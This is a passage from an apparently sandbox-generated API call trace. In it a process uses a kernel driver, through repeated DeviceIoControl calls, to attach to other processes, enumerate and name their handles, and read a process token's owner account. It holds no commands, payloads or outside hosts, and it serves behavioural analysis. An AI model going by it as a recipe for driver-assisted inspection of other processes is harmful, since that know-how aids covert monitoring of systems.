lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0148.935] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.935] PsAcquireProcessExitSynchronization () returned 0x0 [0148.935] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.935] ObReferenceObjectByHandle (in: Handle=0x1f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003945dc0, HandleInformation=0x0) returned 0x0 [0148.935] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.935] PsReleaseProcessExitSynchronization () returned 0x2 [0148.935] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.935] ObQueryNameString (in: Object=0xfffffa8003945dc0, ObjectNameInfo=0xfffffa8002456044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002456044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.935] ObfDereferenceObject (Object=0xfffffa8003945dc0) returned 0x5 [0148.935] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.935] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.936] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.936] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0148.936] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.936] PsAcquireProcessExitSynchronization () returned 0x0 [0148.936] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.936] ObReferenceObjectByHandle (in: Handle=0x260, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003995640, HandleInformation=0x0) returned 0x0 [0148.936] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.936] PsReleaseProcessExitSynchronization () returned 0x2 [0148.936] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.936] ObQueryNameString (in: Object=0xfffffa8003995640, ObjectNameInfo=0xfffffa8002fdd044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fdd044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.936] ObfDereferenceObject (Object=0xfffffa8003995640) returned 0x1 [0148.936] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.936] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.936] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.936] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0148.936] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.936] PsAcquireProcessExitSynchronization () returned 0x0 [0148.936] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.936] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0148.936] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.936] PsReleaseProcessExitSynchronization () returned 0x2 [0148.936] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.936] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002fda044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fda044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.937] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0148.937] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.937] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.937] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.937] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0148.937] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.937] PsAcquireProcessExitSynchronization () returned 0x0 [0148.937] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.937] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0148.937] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.937] PsReleaseProcessExitSynchronization () returned 0x2 [0148.937] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.937] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002fd4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd4044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.937] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0148.937] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.937] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.937] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.937] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0148.937] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.937] PsAcquireProcessExitSynchronization () returned 0x0 [0148.937] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.938] ObReferenceObjectByHandle (in: Handle=0x45c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0148.938] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.938] PsReleaseProcessExitSynchronization () returned 0x2 [0148.938] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.938] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8002fa6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa6044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.938] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0148.938] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.938] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.938] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.938] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0148.938] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.938] PsAcquireProcessExitSynchronization () returned 0x0 [0148.938] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.938] ObReferenceObjectByHandle (in: Handle=0x4ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a669a0, HandleInformation=0x0) returned 0x0 [0148.938] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.938] PsReleaseProcessExitSynchronization () returned 0x2 [0148.938] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.938] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002fa0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa0044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.938] ObfDereferenceObject (Object=0xfffffa8003a669a0) returned 0x1 [0148.938] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.938] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.938] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.938] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0148.939] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.939] PsAcquireProcessExitSynchronization () returned 0x0 [0148.939] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.939] ObReferenceObjectByHandle (in: Handle=0x4f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0148.939] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.939] PsReleaseProcessExitSynchronization () returned 0x2 [0148.939] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.939] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8002fd7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd7044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.939] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0148.939] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.939] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xc8 [0148.939] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0148.939] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80037fe060, HandleInformation=0x0) returned 0x0 [0148.939] ObOpenObjectByPointer (in: Object=0xfffffa80037fe060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0148.939] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x8a [0148.939] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80039a7780 | out: TokenHandle=0xfffffa80039a7780*=0xc4) returned 0x0 [0148.939] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0148.939] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.939] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0148.939] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0148.941] CloseHandle (hObject=0xc4) returned 1 [0148.941] CloseHandle (hObject=0xc8) returned 1 [0148.941] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.941] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0148.942] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.942] PsAcquireProcessExitSynchronization () returned 0x0 [0148.942] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0) [0148.942] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003822610, HandleInformation=0x0) returned 0x0 [0148.942] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.942] PsReleaseProcessExitSynchronization () returned 0x2 [0148.942] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x88 [0148.942] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f9e044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f9e044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.942] ObfDereferenceObject (Object=0xfffffa8003822610) returned 0x1 [0148.942] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.942] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.942] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.942] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0148.942] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.942] PsAcquireProcessExitSynchronization () returned 0x0 [0148.942] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0) [0148.942] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037e8730, HandleInformation=0x0) returned 0x0 [0148.942] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.942] PsReleaseProcessExitSynchronization () returned 0x2 [0148.942] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x88 [0148.942] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002fe9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe9044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.942] ObfDereferenceObject (Object=0xfffffa80037e8730) returned 0x1 [0148.942] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.943] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.943] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.943] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.943] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.943] PsAcquireProcessExitSynchronization () returned 0x0 [0148.943] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0) [0148.943] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0148.943] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.943] PsReleaseProcessExitSynchronization () returned 0x2 [0148.943] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x88 [0148.943] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002fd5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd5044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.943] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0148.943] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.943] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.943] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.943] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0148.943] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.943] PsAcquireProcessExitSynchronization () returned 0x0 [0148.943] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0) [0148.943] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0148.943] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.943] PsReleaseProcessExitSynchronization () returned 0x2 [0148.944] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x88 [0148.944] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002ffc404, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ffc404, ReturnLength=0xfffff88005163550) returned 0x0 [0148.944] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0148.944] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.944] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.944] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.944] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0148.944] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.944] PsAcquireProcessExitSynchronization () returned 0x0 [0148.944] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0) [0148.944] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0148.944] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.944] PsReleaseProcessExitSynchronization () returned 0x2 [0148.944] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x88 [0148.944] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002fed044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fed044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.944] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0148.944] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.944] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.944] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.944] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x22, lpOverlapped=0x0) returned 1 [0148.944] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.944] PsAcquireProcessExitSynchronization () returned 0x0 [0148.945] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0) [0148.945] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034c7670, HandleInformation=0x0) returned 0x0 [0148.945] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.945] PsReleaseProcessExitSynchronization () returned 0x2 [0148.945] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x88 [0148.945] ObQueryNameString (in: Object=0xfffffa80034c7670, ObjectNameInfo=0xfffffa8002fe2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fe2044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.945] ObfDereferenceObject (Object=0xfffffa80034c7670) returned 0xb [0148.945] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.945] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.945] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.945] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0148.945] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.945] PsAcquireProcessExitSynchronization () returned 0x0 [0148.945] KeStackAttachProcess (in: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037fe060, ApcState=0xfffff880051635d0) [0148.945] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001232300, HandleInformation=0x0) returned 0x0 [0148.945] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.946] PsReleaseProcessExitSynchronization () returned 0x2 [0148.946] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x88 [0148.946] ObQueryNameString (in: Object=0xfffff8a001232300, ObjectNameInfo=0xfffffa8002fd6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd6044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.946] ObfDereferenceObject (Object=0xfffff8a001232300) returned 0x2 [0148.946] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.946] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.946] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.946] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0148.946] PsLookupProcessByProcessId (in: ProcessId=0x4c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.946] PsAcquireProcessExitSynchronization () returned 0x0 